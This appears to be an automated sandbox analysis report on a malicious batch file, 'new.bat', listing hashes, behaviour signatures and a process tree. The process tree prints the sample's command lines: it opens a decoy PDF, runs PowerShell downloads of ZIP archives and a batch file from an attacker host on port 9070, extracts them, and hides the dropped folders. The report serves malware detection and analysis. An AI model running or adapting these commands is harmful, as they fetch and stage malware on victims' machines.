Analysis
-
max time kernel
600s -
max time network
359s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
08-08-2024 19:49
General
-
Target
new.bat
-
Size
10.0MB
-
MD5
c16890f92f82d9aa09e0863b9b972fd7
-
SHA1
58095238d31afefaa103a0ba7c9be0c5f76d4049
-
SHA256
8e8027584954b310a51dcedd2d905e557be41d1a14a2edb80f0026bd80d33048
-
SHA512
ccd09d87f7332b227c167c24679f253eb128062073549db799b24d7142b5e77e1669a403be552cda1f82fe608c1e5f9655f7d1b789b0913ff7aa8b203542f295
-
SSDEEP
96:t57sU5Mqwt3o3h2lvzNxmjNzFy5lKXX0lPuvRNUurK2Ltb5MAkZItmniAvTFI4Ns:7A4nQoBkdGpcnWw
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 37 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://transformation-cage-keyboards-rural.trycloudflare.com/kbsfaw.pdf2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2364 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri ' http://robshippings.cloud:9070/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Python"2⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri ' http://robshippings.cloud:9070/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri ' http://robshippings.cloud:9070/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Print"2⤵
- Views/modifies file attributes
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
Filesize
252B
MD58c321abbc31aed763b8f60de633d8a2b
SHA1d5ad233b6907817df989929e2ac13efd9827bd7e
SHA25643a2b5a551e930f57f90db54c535caa9df893c52d9cced24cab142441c9ad0c6
SHA51281744c0edcfe4c27f9b375e4c5f688708ec69f6654384384ac71e2d457ace2456a841377b1bd3d56f8ceeec72043c96f391b31964caa50387b5d4e5a23dea270
-
Filesize
342B
MD5ae188ffb230b2f6666af3307929464ab
SHA10ea70cd827a3bf22e87f9096588ce9189dadc403
SHA25651a0283e866e62efb52d71171c0bfdb22b4f4a604b56d942eb8702a22e3f8649
SHA51274137f1d612a037daf870bbab35cf4da0651bc086ec1a1b5844a1102dc7c85365aee283d9f68122f4accf5508f367894434c69364e846d4e96b83ec28de35d25
-
Filesize
342B
MD5dc58a2d6ef3c4789f847309760842059
SHA1bce549ba8899a1e9809dcb9589d8abaddc361ade
SHA256f57e3ee1bce029bc46a7fb781519b5bbceebf1b8ba589e76a03222cb645874ac
SHA512f185ac05d455120f81a26247d26076a4c0656a7af440c643cb51e3e79449ea1f6967c0ebee8a21bb20e13175e5f926839c148fbeb6979d484f1566f6630a0690
-
Filesize
342B
MD5d68988919ba19854ad147c12cf4a9190
SHA1d94eba158161c61e5544467b2a87635e81ff4ec4
SHA256720488940ef902be54e9a7d47a18587c1e1fd10d2be38656be7738977e6f1079
SHA51235d126297d100bb4b6ca9ed8b2f0c96ac469618b77371213c46c7de78dcc63effa9650049e6098697ff317f8eb039da537e64502d8b26c80aabd0127c6c245c7
-
Filesize
342B
MD5bfeb3caefcfd771dad7f934fc08f99e8
SHA1bbafe77d9aa19c414763f0069b0066fd5e7b2bbe
SHA2566882a22728a3496ccbb10dfd7901daa8c03bc82934806a226551b99c0b2c3285
SHA5129fc913d650bedde6ea3ddaf7b0a836c65e0aaa6d481fd254edfcfccffd3904c2aa6355ef1c2616c7b94c429fd9d05dd0ad3c5a1cd971be5e92925e1a9b7230a9
-
Filesize
342B
MD5da47dee95c54c69ffd4ecf965bc4e647
SHA105fe4f6655943efadfc3d5111ea7a7161eb2e5b4
SHA256342de48fc79f6a556cd315e9ecec716288b395d6502835530957b6e91dcab298
SHA512646937d4c3340b83ea637e37fb331298bd41ff35df5e8f034fbe30af603e7516d277223e026b33106c88619700702a1ff4bd5fc8fd5de725e7a688e2c405ce74
-
Filesize
342B
MD5c15110c85746b1612fbf3c7e3080f4aa
SHA1ba3bf1bcb6b658bf487ca1f6bba6f9e603692ec0
SHA256a4d844b92236e6a92bb0451d82fa03265fe80169dec231ec2c725276e6ca10be
SHA5128e7d38a9b1d742e44eaf2665a1b71de24ca3f0c36e090d2e1b9456ab40019c035a40dd0335b2a22a5a211faf983d321268669d52ed5f8e1c4dded449a8529065
-
Filesize
342B
MD55d1f1e55e2d5a69d43216ff0a4a17f02
SHA1eb458b1904665984c209a7202191b688a297dde9
SHA25671d27dc3770ba745eaccb0961aaab9887a2787b514d0c0704cadbc59cdc641b4
SHA5121a0b2825eb1df376a5a3948a7fdbd40a072fc1be6e070d47758ce61ceb189133ca9dad520152665ed1e02eb3be251529e3e3ecb4fff36a825fe349853bf90e3d
-
Filesize
342B
MD59ff2932fddfdfeb9c81ba03543d5a495
SHA18f65ebeff4fcb10d65a38836412f79832e89447c
SHA2567db39071807590f3ff4938c7ccd9790d4d9b1a82adf9f3da8b1fadfd3dbfc2f4
SHA512f1fb4cb08c5ec1e77cc55c24cab4b42c7b0ada9fc1f7805d6dffea3547df3034b87af876f482d6fb260dc634cee2b4b1523cdb77caea2ba562ba9de6fe2157b6
-
Filesize
342B
MD5bcf0b88ef17aff00ecbffc74b73e1ed1
SHA149b6f2ad3730c16075cb987a363532e9e7a913ea
SHA256c29f80acb5e4e51b799487fab0c4796ba299dfb25fe771be7016805d6d76ab8f
SHA512b863da539b43baa5e229193c5f7415539613e18271682202c7ef997e7d5807f49a8153be2112a8bbab431c0e969a9ba83e5efd86b259c9cd4ac8ac34977f59dd
-
Filesize
342B
MD5f7580de8926fb2d859254291a119ecdf
SHA12f1f7eb629eb3eb0cc587b53cf1a0cefd5d33bc1
SHA256e61200b1822297a7af505aa9e041d36720a7aeaea55207255f5ee56d5eb9950d
SHA5123a0dcd9bad4843160b2c0f55f831ad457d01a7565def390e15d2b5ed3305cb6095a1252eb8613cde4d52a49c00d5dcec9f03987b8a5bf76559a90758087bc946
-
Filesize
342B
MD534757b10cf17f61f884f2b29e5a182a7
SHA1277c702a977678f8b92d27dbe9a4e3cf7d348791
SHA256498fa46c650481d7c7aecdb4300c45fb86d57d060b9bc6ce03a37fac61236682
SHA512e39eaa5aea0792023f3796cc5ed44b3b886f995894d0c0ec45b71dee05bc81c0b16eaf9742992573aae5e607430176bb0ab376fc26ba2ee7e615bc3e190bb8f8
-
Filesize
342B
MD5ae39e1ee8d16d9c1cc74bf64b2a284d1
SHA12211cf2d338ccabb60b130671c0b6c2ed981fa40
SHA25678744d939bf8239a0daa363dc36a19d957e62c872516c98e6d36b82509cbfedc
SHA512ead80b021eba7668f6b9a844fbf7d86a36befc549a67ad89cf728c7a2f3b1ce0cd78bea24945aa1247a5c4cdbc86a400f873b80e7bdb46aee92c322a659a6d12
-
Filesize
342B
MD51af18df482ea4377e3fafe93973607a5
SHA1d8ef22571946ebf88960880dbf276f4fe66e502e
SHA256322019b5050daa70923a667f23ee344074d7ff2649f100a30d1263f4eb1ee13c
SHA5127560914e53a083ed86c26125a9738ba6fd291dff42aadd7106699956f14d695093faa839bdcdf5f173b89061b29bb1d3cd6d7d81ca53b44d4fe8e88544b1765d
-
Filesize
342B
MD5bde5b19a0a58f70290bc470b25bb9f39
SHA1a9ed7a1a37c64fe98126e4f1db5c12646ea41d51
SHA2560328fe3b4b68d17ef20d68ac06dfc4a90d1c35f59578b113ae2bafaf0e1dd0ff
SHA512a056cc65797d764f1fcdb748e9564607e7c06ece8388a9e89e6e3b688d21924f83b1e59b52cb169a140e749fe2993c1079dfc8a11aeb3a9afb8e37f8f422f315
-
Filesize
342B
MD5f1b79755cbf58c26444a7db3a163a085
SHA1998749be802e019409c743bb9879ee5ccce3ff92
SHA256b2e85f159f87d864f5e5ab50fda7d38dce3774a3a91bce01f617b9138155e456
SHA512e43faf6e329fecadc5d935bd5ea00a2b28625769d3eec5a80bf69cbe3b7d0e47e33a66673133602671a6c974715685373b44d45cb4222c05d07cef1df58476b9
-
Filesize
342B
MD5972e687adf6ac4da232913a308fcf597
SHA1ddd0aecff31012fa429a544b44a74671779e65bf
SHA256ed44a055b9c59e0f09eb60a8f8ccd955e70930ffd56821f754b3b2ffc4d716db
SHA51258269ae6082f9d60487dfeef0bffd53f2461e2a328aab147105f4cf21279abcc5890740935bfebc9c3adab9225457f6d9cba667391c27f78bcb4c602d4bb910b
-
Filesize
342B
MD51f650289140f14a994b564528b2da1be
SHA15c8d6638b6527964e4c8623aa2231ea33ba632d5
SHA256e3c1eac54cc3b0655cf23514bd2959782c604bc67405ffff032d6d52f581b0d4
SHA512a7c356bae9561f39122579e8c91bb85efae054e7aaec00f71e0babb12276c2cf0630ce811eb8b65bb0b3b4cf47dbed7227dc9bb3d5fecc71d62cbea72522687d
-
Filesize
342B
MD50c331aaa496992aef2307d7c89d2dd21
SHA1a92c0f1933156eed2dc3f9acb5b35e37e6728d6b
SHA25650a5b981389146828734d3e46afb1e25913190d0f4df6cd48c4e5bb602d60bdf
SHA5122e6abe4826432dedfd481be279f01676a7379e2c88b046b03d0bd92b3e9324b6764bdf77c692fe1edee883f1d15f13ae15eddeeb0c7c8ff70dd75a286db47518
-
Filesize
342B
MD55b377fa88cc236953d4dbdbdc4e98678
SHA1c72ba802f2a0501959ea32d628e504202abef064
SHA25608cbdf7d0e390ead77696b6d8b799ec2d4c3e30dcc090baaff96044a3a54e84f
SHA5125ace9cb5e513a91a4d1e3770d2e0bae3171618f8abfbffba288fe0934e3fd5bbfde64ceb499218e64045d1a063907add70e128d2c9f6a9d4ab02ae018ad60e96
-
Filesize
242B
MD5dd80ab12bc66be1584e767767eab7a3c
SHA12ed168c554b443024259726f535f50028e7f6388
SHA25613ee439b6f3677bbb782fff743735d08f2149ffe42f1daf9d021b071c996038d
SHA512dc93993a83002a0f30955907029b68361a6e7ba94032a77af4029128a714aa19edc8eddc0269622ca26bcc7ca0e965846791b3b08996c9a7b1de8cd3a92d984c
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD567ac98c2873e09943755bee96e21a7a9
SHA1a92c9ddd11f1fb33fa8842a1aa787c330db5051d
SHA25629f412adfede28db8ba7fbf982d2248029b6821119ddfcc4fb627fa932c8f169
SHA5126927cc18bd6ddd68cc75c5c2b14c5a7c350f537bd90c56325d0ff0693c50663ea67398f0585bed7c0fe19ea372c075fb8a552c45de8e2f16b7cbc1a1d7cdcbe8
-
Filesize
7KB
MD535cae7ab032462898c3ea1dbd08abe37
SHA1ace9699d3687bf788a60d95fac04f0fc788a2242
SHA256dd8caf5ace36b8982d8c38b74d8bd88c83acfb949d3110f730c4e791e15f782b
SHA51237f160d285a5840bc4afe2829b556d347be3c5ec031701e547ff650f73dcd73940ea48fdbd011438675d4c810f3e3c33d347263165cea6797db9bb883957dc24
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB